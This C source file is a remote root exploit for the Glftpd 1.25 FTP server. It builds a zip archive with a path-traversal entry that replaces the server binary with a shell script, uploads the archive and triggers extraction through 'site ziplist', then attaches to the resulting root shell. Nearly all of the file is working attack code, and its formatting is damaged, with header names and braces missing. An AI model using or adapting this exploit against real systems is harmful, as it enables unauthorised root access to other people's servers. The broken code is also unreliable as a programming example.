/* Glftpd 1.25 PoC remote root exploit appelast [appelast-at-bsquad.sm.pl] We don't need writable directory to upload our file, we change our euid before it to 0 :> */ #define TMP_ZIP "/tmp/kakaka.zip" #define TMP_CMDS "/tmp/glcmds" #include #include #include #include #include #include #include #include // shellcode ;) signed int shellcode[221]={80,75,3,4,10,0,0,0,0,0,83,125,-102,45,98,68,108,-96,15 ,0,0,0,15,0,0,0,37,0,21,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47 ,46,46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112 ,100,85,84,9,0,3,110,35,11,62,-33,99,11,62,85,120,4,0,0,0,0,0,35,33,47 ,98,105,110,47,115,104,10,115,104,32,45,105,80,75,1,2,23,3,10,0,0,0,0, 0,83,125,-102,45,98,68,108,-96,15,0,0,0,15,0,0,0,37,0,13,0,0,0,0,0,1,0 ,0,0,-19,-127,0,0,0,0,46,46,47,46,46,47,46,46,47,46,46,47,46,46,47,46, 46,47,46,46,47,46,46,47,46,46,47,98,105,110,47,103,108,102,116,112,100 ,85,84,5,0,3,110,35,11,62,85,120,0,0,80,75,5,6,0,0,0,0,1,0,1,0,96,0,0, 0,103,0,0,0,0,0}; void usage(char *progname) { printf("Glftpd 1.25 remote root exploit\n" "appelast [appelast-at-bsquad.sm.pl]\n" "usage : %s host port user password\n\n" ,progname); int openhost(char *host,int port) { int sock; struct sockaddr_in addr; struct hostent *he; he=gethostbyname(host); if (he==NULL) return -1; sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); if (sock==-1) return -1; memcpy(&addr.sin_addr, he->h_addr, he->h_length); addr.sin_family=AF_INET; addr.sin_port=htons(port); if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1; return sock; void openshell(int sock) char buf[1024]; fd_set rset; int i; while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(sock,&rset)) { i=read(sock,buf,1024); if (i <= 0) { printf("The connection was closed!\n"); exit(0); } buf[i]=0; puts(buf); } if (FD_ISSET(STDIN_FILENO,&rset)) { i=read(STDIN_FILENO,buf,1024); if (i>0) { buf[i]=0; write(sock,buf,i); } } } int main(int argc, char *argv[]) { int fd, i; char buf[1024]; char user[25], pass[25]; memset(buf,0,1024); usage(argv[0]); if (argc!=5) exit(0); snprintf(user, 24,"%s", argv[3]); snprintf(pass, 24,"%s", argv[4]); printf("Creating evil .zip file : "); fd = open(TMP_ZIP,O_RDWR|O_CREAT|O_TRUNC,0600); if (fd<0) { perror("open"); exit(0); } for (i=0; i<221; i++) { (int)buf[0]=shellcode[i]; buf[1]=0; write(fd,buf,1); } close(fd); printf("DONE\n"); printf("Creating commands file : "); fd = open(TMP_CMDS,O_RDWR|O_CREAT|O_TRUNC,0600); if (fd<0) { perror("open"); exit(0); } sprintf(buf,"quote user %s\n" "quote pass %s\n" "site onel hellou\n" "put %s %s\n" "site ziplist --l --v -o %s\n" "del %s\n", user, pass, TMP_ZIP, strrchr(TMP_ZIP, 0x2f)+1, strrchr(TMP_ZIP, 0x2f)+1, strrchr(TMP_ZIP, 0x2f)+1); write(fd, buf, strlen(buf)); close(fd); printf("DONE\n"); printf("Exploiting ... "); snprintf(buf, 1023, "ftp -n %s %i < /tmp/glcmds", argv[1], atoi(argv[2])); system(buf); unlink(TMP_ZIP); unlink(TMP_CMDS); printf("DONE\n"); printf("Connecting to rootshell\n"); openshell(openhost(argv[1],atoi(argv[2]))); return 0; }